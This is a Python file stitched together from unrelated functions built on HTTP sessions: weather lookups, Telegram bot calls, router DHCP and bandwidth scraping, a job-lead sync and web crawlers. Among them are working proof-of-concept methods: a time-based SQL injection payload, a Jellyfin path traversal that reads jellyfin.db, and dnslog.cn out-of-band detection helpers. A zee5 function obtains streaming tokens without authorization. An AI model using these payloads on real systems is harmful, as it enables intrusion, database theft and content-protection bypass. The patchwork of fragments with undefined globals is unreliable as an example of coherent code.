def dnslog_getdomain(self, session):
    url = 'http://www.dnslog.cn/getdomain.php?t=0'
    try:
        res = session.get(url, verify=False, timeout=10)
        return res.text
    except Exception as e:
        print("\033[31m[x] Request failed \033[0m", e)
def call_place(self, session, place, states: dict):
    '''
    Makes an API call with the name of a place provided
    - Args:
        - place: name to consult
        - session: from `requests.session`, allows it to run inside an async function
        - states (`dict`): containing the cache
    - Prints:
        - Today's weather forecast data
    '''
    ow_url = 'https://api.openweathermap.org/data/2.5/weather?q={}&exclude=minutely,hourly&appid={}&units=metric'
    pl = unidecode.unidecode(place)
    if pl in states:
        print(place + '\n' + get_todays_forecast(pl) + '\n')
        return get_todays_forecast(pl)
    with session.get(ow_url.format(place, self.__api)) as response:
        if response.status_code != 200:
            return None
        try:
            to_save = save(response, pl, dir='./Data/set2')
            states.update({pl: to_save['dt']})
            print(place + '\n' + get_todays_forecast(pl) + '\n')
            return get_todays_forecast(pl)
        except Exception:
            print("Can't request a forecast for " + place + '\n')
            return None
def call_coordinates(self, session, place, states: dict):
    '''
    Makes an API call with the coordinates of the IATA place provided
    - Args:
        - place: IATA code to consult
        - session: from `requests.session`, allows it to run inside an async function
        - states (`dict`): containing the cache
    - Prints:
        - Weather forecast data
    '''
    ow_url = 'https://api.openweathermap.org/data/2.5/onecall?lat={}&lon={}&exclude=minutely,hourly&appid={}&units=metric'
    coordinates = self._iata.coordinates(place)
    t = str(coordinates[0]) + '_' + str(coordinates[1])
    if t in states:
        print(self._iata.place(place) + '\n' + get_full_forecast(t) + '\n')
        return get_full_forecast(t)
    with session.get(
            ow_url.format(coordinates[0], coordinates[1], self.__api)) as response:
        if response.status_code != 200:
            return None
        try:
            to_save = save(response, t)
            states.update({t: to_save['current']['dt']})
            print(self._iata.place(place) + '\n' + get_full_forecast(t) + '\n')
            return get_full_forecast(t)
        except Exception:
            print("Can't request a forecast for " + self._iata.place(place) + '\n')
            return None
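# A minimal usage sketch for the two call_* methods above. Hedged: `forecaster`
# stands for an instance of the enclosing class and is passed in rather than
# constructed here. The same requests.Session and cache dict are shared across
# calls, so a second lookup of a place is answered from `states` instead of
# hitting OpenWeatherMap again.
def _demo_forecast_calls(forecaster):
    import requests
    cache: dict = {}
    with requests.Session() as s:
        forecaster.call_place(s, 'Madrid', cache)     # first call hits the API
        forecaster.call_place(s, 'Madrid', cache)     # served from the cache
        forecaster.call_coordinates(s, 'MAD', cache)  # IATA-code variant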
def sendVideo(chatId, video):
    # Check whether the video was actually downloaded
    if (video == ".mp4") or (video == ""):
        sendMessage(chatId, "Could not find the url you sent :(")
    else:
        url = 'https://api.telegram.org/bot' + botToken + '/sendVideo'
        parameters = {
            'chat_id': chatId
            # The file parameter is passed separately in the request
        }
        print('Sending to Telegram...')
        session = Session()
        try:
            with open(video, 'rb') as video_file:
                # File uploads must go through POST; GET cannot carry a multipart body
                response = session.post(url, data=parameters,
                                        files={'video': video_file})
            data = json.loads(response.text)
            #print(json.dumps(data, indent=4, sort_keys=True))
        except (ConnectionError, Timeout, TooManyRedirects) as error:
            print(error)
def fetch_dhcp_list(log=False):
    # Fetches the DHCP lease list and updates the hostname maps
    dhcp_leases = {
        "No.": [],
        "Hostname": [],
        "MAC": [],
        "IP": [],
        "Initial Lease": [],
        #"Expires in": []
    }
    dhcp_response = session.get(dhcp_url).content.decode()
    dhcp_soup = BeautifulSoup(dhcp_response, 'html.parser')
    table_rows = dhcp_soup.find_all('tr')[1:]  # table of dhcp leases
    for count, row in enumerate(table_rows):
        soup_table_data = BeautifulSoup(str(row), 'html.parser')
        row_data = [item.string for item in soup_table_data.find_all('td')]
        dhcp_leases['No.'].append(count + 1)
        dhcp_leases['Hostname'].append(row_data[0])
        dhcp_leases['MAC'].append(row_data[1])
        dhcp_leases['IP'].append(row_data[2])
        #dhcp_leases['Expires in'].append(row_data[3])
        dhcp_leases['Initial Lease'].append(
            get_lease_initial_time(row_data[3]))
        host_names_from_mac[row_data[1].upper()] = row_data[0]
        host_names_from_ip[row_data[2]] = row_data[0]
    if log and dhcp_leases['Hostname']:
        print(tabulate(dhcp_leases, headers="keys", tablefmt="psql"))
def read(self):
    session = self.__get_cookie()
    f = BytesIO()
    title_element = self.soup.find("b", {"class": "cut_line_one"})
    # Maybe NavigableString?
    assert isinstance(title_element, Tag)
    self.title = title_element.text
    # CSS selector is not working :(
    ep_num = self.soup.find(
        "span",
        {
            "style": "background-color:rgba(155,155,155,0.5);padding: 1px 6px;border-radius: 3px;font-size: 11px; margin-right: 3px;"
        },
    )
    assert isinstance(ep_num, Tag)
    ep_name = self.soup.find("span", {"class": "cut_line_one"})
    assert isinstance(ep_name, Tag)
    # Dirty, but needed for a clean filename
    replaced_name = ep_name.text.replace(ep_num.text, "", 1)
    self.filenames[f] = clean_title(f"[{ep_num.text}] {replaced_name}.txt", "safe")
    # https://novelpia.com/viewer/:number:
    numbers: List[str] = []
    numbers.append(self.__get_number(self.parsed_url[2]))
    # Get the real contents
    # https://novelpia.com/proc/viewer_data/:number:
    # {"s": [{"text": ""}]}
    viewer_datas = map(
        lambda number: f"https://novelpia.com/proc/viewer_data/{number}",
        numbers)
    for viewer_data in viewer_datas:
        response = session.get(viewer_data)
        if response.text:
            response = response.json()
            for text_dict in response["s"]:
                text = text_dict["text"]
                if "img" in text:
                    soup = Soup(text)
                    img = soup.find("img")
                    # Maybe NavigableString here too?
                    assert isinstance(img, Tag)
                    src = img.attrs["src"]
                    filename = img.attrs["data-filename"]
                    f.write(f"[{filename}]".encode("UTF-8"))
                    self.urls.append(f"https:{src}")
                    self.filenames[f"https:{src}"] = filename
                else:
                    f.write(text_dict["text"].encode("UTF-8"))
            f.seek(0)
            self.urls.append(f)
        else:
            self.print_(f"{viewer_data} This work requires login.")
def print_bandwidth_rules(get_disabled=False):
    def get_hostnames_from_ip_range(ip_range):
        # Walk every address in the range and collect known hostnames
        start_ip = int(ip_range.split('-')[0].split('.')[3])
        end_ip = int(ip_range.split('-')[1].split('.')[3])
        res = []
        for ip in range(start_ip, end_ip + 1):
            current_ip = "192.168.1." + str(ip)
            current_host = host_names_from_ip.get(current_ip)
            if not current_host:
                continue
            res.append(current_host + f' ({current_ip})')
        return "".join(host + "\n" for host in res)

    bandwidth_response = session.get(bandwidth_url).content.decode()
    band_soup = BeautifulSoup(bandwidth_response,
                              'html.parser').find_all('script')[2].string[25:1000]
    query_list_raw = band_soup.split("'")[1].split(";")  # parse existing queries from the js
    query_list = [q for q in query_list_raw if q]
    queries = [Bandwidth_query(elem) for elem in query_list]
    query_table_data = {
        'No.': [],
        'Description': [],
        'Hostname': [],
        'IP (Range)': [],
        'Up Speed': [],
        'Down Speed': [],
    }
    if get_disabled:
        query_table_data['Enabled'] = []
    count = 1
    for query in queries:
        if not (query.enabled or get_disabled):
            continue
        query_table_data['No.'].append(count)
        count += 1
        query_table_data['Description'].append(query.description)
        if get_disabled:
            query_table_data['Enabled'].append(query.enabled)
        query_table_data['IP (Range)'].append(query.ip if query.ip else query.ip_range)
        query_table_data['Up Speed'].append(query.upspeed)
        query_table_data['Down Speed'].append(query.downspeed)
        if query.ip and host_names_from_ip.get(query.ip):
            query_table_data['Hostname'].append(host_names_from_ip[query.ip])
        else:
            range_hosts = get_hostnames_from_ip_range(query.ip_range)
            if range_hosts:
                query_table_data['Hostname'].append(range_hosts)
            else:
                query_table_data['Hostname'].append('No clients')
                if not get_disabled:
                    # remove "no client" rules from the table
                    for column in query_table_data:
                        query_table_data[column].pop()
    if len(query_table_data['No.']) == 0:
        print('No bandwidth control rules are set')
    else:
        print(tabulate(query_table_data, headers='keys', tablefmt='psql'))
def erpnext_jobs_sync():
    # Get settings doctype
    erpnext_jobs_settings = frappe.get_doc("ERPNext Jobs Settings")
    if not erpnext_jobs_settings:
        return
    # Get username, password and url from the settings doctype
    username = erpnext_jobs_settings.username
    password = erpnext_jobs_settings.get_password("password")
    url = erpnext_jobs_settings.url
    jobs_url = erpnext_jobs_settings.jobs_url
    job_contact_url = erpnext_jobs_settings.job_contact_url
    company = erpnext_jobs_settings.company
    if not (username and password and url and jobs_url and job_contact_url and company):
        frappe.msgprint("Check ERPNext Job Settings")
        return
    # Log in and return the session for further calls
    session = __erpnext_login_and_return_session(username, password,
                                                 url + "/api/method/login")
    if not session:
        frappe.msgprint("Unable to create Session")
        return
    # Get the job page HTML
    response = session.get(url=jobs_url)
    total_added = 0
    if response.ok:
        job_links = __get_job_links_from_html(response.text)
        frappe.msgprint("Found %s job links" % len(job_links))
        for job_link in job_links:
            job_data_response = session.get(job_contact_url + "/" + job_link)
            if job_data_response.ok:
                job_data = __get_data_from_job_page(job_data_response.text)
                added_new = __create_lead_if_does_not_exist(
                    job_contact_url + "/" + job_link, job_data, company)
                if added_new:
                    total_added = total_added + 1
    frappe.msgprint("Added %s New Jobs" % (total_added))
def remove_rule():
    ran = random.randrange(10000, 9999999)

    def validate_inp(text):
        values = text.split(" ")
        try:
            for i in values:
                num = int(i)
                if (num < 1) or (num > len(query_list)):
                    return -1
        except ValueError:
            return -1
        return 1

    print_bandwidth_rules(get_disabled=True)
    bandwidth_response = session.get(bandwidth_url).content.decode()
    band_soup = BeautifulSoup(bandwidth_response,
                              'html.parser').find_all('script')[2].string[25:1000]
    query_list_raw = band_soup.split("'")[1].split(";")
    # filter empty strings from the raw list
    query_list = [q for q in query_list_raw if q]
    if not query_list:
        print('No bandwidth control rules are set')
        return
    inp = input('Enter rule numbers to delete separated by a space >>')
    if validate_inp(inp) != -1:
        remove_indexes = [int(i) - 1 for i in inp.split(" ")]
        final_q_list = [q for i, q in enumerate(query_list)
                        if i not in remove_indexes]
        res_string = ";".join(final_q_list)
        command_url = root_url + f"bondwidctr.cmd?enblQos=1&qosList={res_string}&sessionKey={ran}"
        session.get(command_url)
        print('Rule(s) removed successfully')
        return
    print('Invalid number')
def dnslog_getrecords(self, session, target_url, domain, count):
    url = 'http://www.dnslog.cn/getrecords.php?t=0'
    try:
        res = session.get(url, verify=False, timeout=10)
    except Exception as e:
        print("\033[31m[x] Request failed \033[0m", e)
        return  # res is undefined here, so bail out before using it
    if domain in res.text:
        if count == 0:
            print(f'[+] Got a record for {domain}; target {target_url} may be vulnerable')
        else:
            print(f'[{count}] Got a record for {domain}; target {target_url} may be vulnerable')
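# A minimal sketch of chaining the two dnslog helpers above for out-of-band
# detection. Hedged: `poc_obj` is an instance of the enclosing class, and the
# commented trigger step stands in for whatever request makes the target
# resolve the domain. dnslog.cn ties the generated subdomain to the session
# cookie, so the same `session` must be reused for getrecords.
def _demo_dnslog_check(poc_obj, session, target_url):
    subdomain = poc_obj.dnslog_getdomain(session)  # e.g. 'xxxxxx.dnslog.cn'
    if not subdomain:
        return
    # send_trigger_payload(target_url, subdomain)  # hypothetical trigger step
    poc_obj.dnslog_getrecords(session, target_url, subdomain, 0)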
def show_session(sid, uid):
    session = api_call(args.ip, 443, "show-session", {"uid": uid}, sid)
    return {
        "type": session.get("type"),
        "changes": session.get("changes"),
        "mode": session.get("connection-mode"),
        "locks": session.get("locks"),
        "publish-time": session.get("publish-time"),
        "state": session.get("state"),
        "creator": session.get("creator"),
        "ip-address": session.get("ip-address"),
        "uid": uid
    }
def main():
    url = "https://www.google.com/"
    res = requests.get(url, proxies=proxies)
    print(res)
    print(res.url)
    print(res.headers)
    print(res.status_code)
    print(res.text)
    with get_session() as session:
        res = session.get(url, proxies=proxies)
        res.raise_for_status()
        print(res)
def testBot():
    url = 'https://api.telegram.org/bot' + botToken + '/getMe'
    session = Session()
    try:
        response = session.get(url)
        data = json.loads(response.text)
        print(json.dumps(data, indent=4, sort_keys=True))
    except (ConnectionError, Timeout, TooManyRedirects) as error:
        print(error)
def create_session(test_ip=True):
    max_threads = multiprocessing.cpu_count()
    session = requests.Session()
    if proxy:
        # Build the proxy map only when a proxy is actually configured
        session.proxies = {'http': 'socks5h://' + proxy,
                           'https': 'socks5h://' + proxy}
    session.mount(
        'https://',
        HTTPAdapter(pool_connections=max_threads, pool_maxsize=max_threads))
    if test_ip:
        ip = session.get('https://checkip.amazonaws.com').text.strip()
        print("Session IP: " + ip)
    return session
def zee5(official_link):
    session = requests.Session()
    official_link_trim = official_link.split("/")[-1]
    res = session.get("https://gwapi.zee5.com/content/details/" +
                      official_link_trim + "?translation=en&country=IN&version=2")
    res_json = json.loads(res.text)
    try:
        res_customization = res_json["video_details"]["hls_url"].split('/')
    except (KeyError, TypeError):
        print("\n")
        print(Fore.LIGHTRED_EX + "XXXX--Invalid Url or playlist provided!--XXXX")
        deinit()
        exit()
    hls_value = modified_url(res_customization[1])
    finalizing_link = "/".join(res_customization[2:])
    #res2 = session.get("https://useraction.zee5.com/token/platform_tokens.php?platform_name=web_app")
    #print(res2.text)  # prints the authorization token without any authorization
    res3 = session.get("http://useraction.zee5.com/tokennd/")
    #print(res3.text)  # returns a valid hmac token with timestamp
    res3_text = res3.json()
    video_token = res3_text["video_token"]
    print("\n")
    print(Fore.LIGHTGREEN_EX + "Authorized URL to stream:")
    link = ("https://zee5vodnd.akamaized.net/" + hls_value +
            finalizing_link + video_token)
    print(Fore.LIGHTBLUE_EX + link)
    print("\n")
    print(Fore.LIGHTRED_EX +
          'Give damn credit to https://ttttt.me/believerseller Remember!!! ;)')
    print(Style.RESET_ALL)
def send_msg(date):
    with requests.session() as session:
        fin_end_point = url_for_findbydist + f"?district_id={district_id}&date={date}"
        response = session.get(url=fin_end_point, headers=headers)
        response = response.json()
        # Alert for any slot whose age limit is not 45 and whose capacity is above zero
        # (loop variable renamed from `session` to avoid shadowing the requests session)
        for slot in response['sessions']:
            if (slot['min_age_limit'] != 45) and (slot['available_capacity'] > 0):
                message_string = (
                    f"Subject: Alert!! \n\n Available - {slot['available_capacity']} "
                    f"in {slot['name']} on {slot['date']} for the age "
                    f"{slot['min_age_limit']} and link https://www.cowin.gov.in/home ")
                telegram_send.send(messages=[message_string])
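# A minimal polling sketch around send_msg above. Hedged: the 30-minute
# interval is illustrative, and the DD-MM-YYYY date format is assumed, as
# that is what CoWIN's findByDistrict endpoint is generally documented to expect.
def _demo_schedule_alerts():
    import time
    from datetime import datetime
    while True:
        send_msg(datetime.now().strftime('%d-%m-%Y'))
        time.sleep(30 * 60)  # re-check every half hour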
def get_size(file_url):
    download_file = {}
    try:
        r = requests.get(file_url, headers=headers)
    except (ConnectionError, requests.exceptions.SSLError):
        # Fall back to a proxied session when the direct request fails
        session = proxify()
        r = session.get(file_url, headers=headers)
    download_file['URL'] = file_url
    download_file['Size'] = sizeof_fmt(int(r.headers['content-length']))
    # download_file['Thumbnail'] =
    return download_file
def download(file_url):
    identifier = file_url.split('/')[3]
    quality = file_url.split('/')[-1]
    file_name = identifier + '_' + quality
    if not file_name.endswith('.mp4'):
        file_name = file_name + '.mp4'
    with open(file_name, 'wb') as downloaded:
        session = proxify()
        # Stream the response so large files are written in 1 KiB chunks
        r = session.get(file_url, headers=headers, stream=True)
        for data in r.iter_content(1024):
            downloaded.write(data)
def poc(self, target_url, session):
    url = f"{target_url}/api/dp/rptsvcsyncpoint?ccid=1';"
    payload = url + "SELECT PG_SLEEP(1)--"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'
    }
    try:
        res = session.get(url=payload, headers=headers, verify=False, timeout=10)
        return res
    except Exception as e:
        print("\033[31m[x] Request failed \033[0m", e)
def poc(self, target_url, session):
    payload = r'..\data\jellyfin.db'  # raw string keeps the backslashes literal
    url = f"{target_url}/Audio/1/hls/{quote(payload)}/stream.mp3/"
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'
    }
    try:
        res = session.get(url=url, headers=headers, verify=False, timeout=10)
        return res
    except Exception as e:
        print("\033[31m[x] Request failed \033[0m", e)
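# A sketch of driving either poc() method above. Hedged: `poc_obj` is an
# instance of the enclosing class, and the status-code test is illustrative
# only; a real check for the time-based SQL injection in the first poc would
# compare response times with and without PG_SLEEP.
def _demo_run_poc(poc_obj, target_url):
    import requests
    session = requests.Session()
    res = poc_obj.poc(target_url, session)
    if res is not None and res.status_code == 200:
        print(f'[+] {target_url} responded; inspect the result manually')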
def create_session(test_ip=True):
    session = requests.Session()
    if proxy:
        # Build the proxy map only when a proxy is actually configured
        session.proxies = {'http': f'socks5h://{proxy}',
                           'https': f'socks5h://{proxy}'}
    if cert:
        session.verify = cert
    max_threads2 = cpu_count()
    session.mount(
        'https://',
        HTTPAdapter(pool_connections=max_threads2, pool_maxsize=max_threads2))
    if test_ip:
        ip = session.get('https://checkip.amazonaws.com').text.strip()
        print("Session IP: " + ip)
    return session
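# A short usage sketch for create_session above. Hedged: the module-level
# `proxy` and `cert` values are assumed to be configured elsewhere, e.g.
# proxy = '127.0.0.1:9050' for a local Tor SOCKS proxy ('socks5h' also
# resolves DNS through the proxy, not locally).
def _demo_session_usage():
    s = create_session(test_ip=True)  # prints the exit IP seen by AWS
    r = s.get('https://example.com', timeout=10)
    print(r.status_code)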
def main(search):
    query = urllib.parse.quote_plus(search)
    session = HTMLSession()
    response = session.get('https://www.google.com/search?q=' + query)
    links = list(response.html.absolute_links)
    google_domains = (
        'https://www.google.',
        'https://google.',
        'https://webcache.googleusercontent.',
        'http://webcache.googleusercontent.',
        'https://policies.google.',
        'https://support.google.',
        'https://maps.google.',
        'http://scholar.google.com',
        'https://www.youtube.com',
        'https://en.wikipedia.org',
        'https://yt.be'
    )
    # Drop Google's own properties from the result set
    for url in links[:]:
        if url.startswith(google_domains):
            links.remove(url)
    processes = []
    queue = multiprocessing.Queue()
    for link in links:
        p = multiprocessing.Process(target=sub, args=(link, queue))
        processes.append(p)
        p.start()
    for p in processes:
        p.join()
    urlList = [queue.get() for p in processes]
    urlList = sorted(urlList, key=lambda l: l.num, reverse=True)
    urlList2 = []
    #webbrowser.open_new(urlList[0].link)
    for l in urlList:
        if l.num > 2:
            urlList2.append(l)
    return urlList2
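# A short usage sketch for main() above. Hedged: the result objects are
# produced by the external sub() worker and are assumed to expose the .num
# and .link attributes used in the sort.
def _demo_search(term):
    for result in main(term):
        print(result.num, result.link)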
def getChat():
    url = 'https://api.telegram.org/bot' + botToken + '/getChat'
    chatId = input('Id: ')
    parameters = {'chat_id': chatId}
    session = Session()
    try:
        response = session.get(url, params=parameters)
        data = json.loads(response.text)
        print(json.dumps(data, indent=4, sort_keys=True))
    except (ConnectionError, Timeout, TooManyRedirects) as error:
        print(error)
def getUpdates():
    url = 'https://api.telegram.org/bot' + botToken + '/getUpdates'
    parameters = {'limit': '1', 'offset': '-1'}
    session = Session()
    try:
        response = session.get(url, params=parameters)
        data = json.loads(response.text)['result']
        #print(json.dumps(data, indent=4, sort_keys=True))
        return data
    except (ConnectionError, Timeout, TooManyRedirects) as error:
        print(error)
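# A minimal polling sketch built on getUpdates above. Hedged: the loop, the
# sleep interval, and the update-id bookkeeping are illustrative and not part
# of the original bot. With limit=1 and offset=-1, getUpdates returns only
# the most recent update.
def _demo_poll_updates():
    import time
    last_seen = None
    while True:
        data = getUpdates()
        if data and data[0]['update_id'] != last_seen:
            last_seen = data[0]['update_id']
            print(data[0].get('message', {}).get('text'))
        time.sleep(2)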
def authenticate(self, session: requests.Session):
    # Call any endpoint with HTTP Basic Auth and store the session cookie
    try:
        auth_response = session.get(
            url=f"{self.base_url}/restconf/data/v1/cisco-customer:customer",
            auth=(self.username, self.password))
        if auth_response.status_code == 200:
            self.logger.info("Authentication Successful.")
        elif auth_response.status_code == 401:
            self.logger.error(
                "Authentication Error. Check username and password.")
    except requests.exceptions.ConnectionError as e:
        self.logger.error(
            f"Connection Error. Cannot connect to {self.base_url}. Exception: {repr(e)}"
        )
    except Exception as e:
        self.logger.error(f"Encountered unhandled exception: {repr(e)}")
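# A minimal sketch of driving authenticate() with a fresh session. Hedged:
# `client` stands for an instance of the enclosing class with base_url,
# username, password and logger already set; on success the returned session
# carries the cookie stored during the basic-auth call, so later requests
# need no credentials.
def _demo_authenticate(client):
    import requests
    session = requests.Session()
    client.authenticate(session)
    return session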
def changeTitle():
    title = input('New title: ')
    #chatId = input('Chat ID: ')
    url = 'https://api.telegram.org/bot' + botToken + '/setChatTitle'
    parameters = {'chat_id': '-563780415', 'title': title}
    session = Session()
    try:
        response = session.get(url, params=parameters)
        data = json.loads(response.text)
        print(json.dumps(data, indent=4, sort_keys=True))
    except (ConnectionError, Timeout, TooManyRedirects) as error:
        print(error)
def sendMessage(chatId, message):
    if (chatId == -1) and (message == -1):
        chatId = input('Id: ')
        message = input('Message: ')
    url = 'https://api.telegram.org/bot' + botToken + '/sendMessage'
    parameters = {'chat_id': chatId, 'text': message}
    session = Session()
    try:
        response = session.get(url, params=parameters)
        data = json.loads(response.text)
        #print(json.dumps(data, indent=4, sort_keys=True))
    except (ConnectionError, Timeout, TooManyRedirects) as error:
        print(error)
def get_cookie(cfg):
    """ Fetch the cookies """
    # Start a session
    session = requests.session()
    response = session.get(cfg['first_url'])
    #response.raise_for_status()
    cookie_sessionid = session.cookies.get(cfg['cookie_sessionid'])
    cookie_starturl = session.cookies.get(cfg['cookie_starturl'])
    cookies = {
        cfg['cookie_sessionid']: cookie_sessionid,
        cfg['cookie_starturl']: cookie_starturl
    }
    #print(f'{cookie_sessionid}:{cookie_starturl}')
    form_data = get_formdata(response)
    #print(response.content)
    #print(response.text)
    return cookies, form_data
def _crawl_user_page(user_home_page_url):
    ua = UserAgent()
    headers = {
        'authority': 'www.zhihu.com',
        'pragma': 'no-cache',
        'cache-control': 'no-cache',
        'upgrade-insecure-requests': '1',
        'user-agent': ua.chrome,
        'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
        'sec-fetch-site': 'none',
        'sec-fetch-mode': 'navigate',
        'sec-fetch-user': '******',
        'sec-fetch-dest': 'document',
        'referer': r'https://www.baidu.com/s?wd=%E7%9F%A5%E4%B9%8E',
        'accept-language': 'zh-CN,zh;q=0.9'
    }
    response = session.get(user_home_page_url, headers=headers)
    _html = response.text
    return _html
def print_wifi_clients():
    wifi_clients = {
        "No.": [],
        "MAC": [],
        "Hostname": []
    }
    wifi_clients_response = session.get(wifi_clients_url).content.decode()
    wifi_soup = BeautifulSoup(wifi_clients_response, 'html.parser')
    table_rows = wifi_soup.find_all('tr')[1:]
    for count, row in enumerate(table_rows):
        soup_table_data = BeautifulSoup(str(row), 'html.parser')
        row_data = [soup_table_data.find('td').string]
        wifi_clients['No.'].append(count + 1)
        wifi_clients['MAC'].append(row_data[0])
        wifi_clients['Hostname'].append(
            host_names_from_mac[row_data[0].strip().upper()])
    if wifi_clients['MAC']:
        print(tabulate(wifi_clients, headers="keys", tablefmt="psql"))
    else:
        print('No device is connected to the network through WiFi')